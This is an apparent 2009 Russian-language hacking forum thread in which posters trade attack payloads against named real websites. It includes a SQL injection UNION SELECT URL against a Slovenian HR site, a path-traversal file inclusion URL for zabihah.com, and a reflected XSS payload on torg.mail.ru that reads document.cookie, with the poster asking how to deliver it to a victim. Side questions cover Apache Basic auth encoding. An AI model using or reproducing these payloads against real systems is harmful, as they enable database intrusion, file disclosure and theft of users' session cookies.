09.03.2009, 16:19
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Подскажите здесь есть вывод данных -
http://www.sklad-kadri.si/kadrovske/?k=izpis&id=5061112000123123+union+select+1,2,3,4, 5,6--+ ?
|
|
|
10.03.2009, 16:02
|
|
Участник форума
Регистрация: 29.12.2004
Сообщений: 105
Провел на форуме:
89596
Репутация:
21
|
|
Как быть offline vkontakte.ru
Сообщение от VIP
Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.
Где под firefox 3 в ubuntu можно найти сам этот profile.php ?
|
|
|
|
09.03.2009, 16:19
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..
|
|
|
|
09.03.2009, 21:56
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235
Репутация:
39
|
|
Сообщение от faza02
http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..
http://www.zabihah.com/da.php?id=1/../../../../../index
|
|
|
|
10.03.2009, 10:45
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175
Репутация:
0
|
|
Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>
Вопрос, как её заносить в ссылку на моём хосте по которой должен отклик от жертвы произойти, со скриптом ("><script>alert(document.cookie)</script>) или без ????? |
|
|
|
09.03.2009, 16:22
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Тут:
Код:
http://www.sklad-kadri.si/kadrovske/?k=izpis&id=-5061112000123123+union+select+1,2,3,4,5,6,7,8,9,0,11,12/*
|
|
|
|
09.03.2009, 21:00
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Есть пасы от Апачевской авторизации(Basic). Шифруются ли они чем-нибудь?
|
|
|
|
09.03.2009, 21:04
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от Shaitan-Devil
Есть пасы от Апачевской авторизации(Basic). Шифруются ли они чем-нибудь?
как они выглядят покажи
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
09.03.2009, 21:13
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
В basic используется Base64 шифрование.
|
|
|
|
09.03.2009, 21:18
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Для передачи - шифрование base64, но в самих файлах (.htpasswd) пассы обычно зашифрованы DES'ом
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1159982){kind=avatar}
Похожие темы
Комбинированный вид
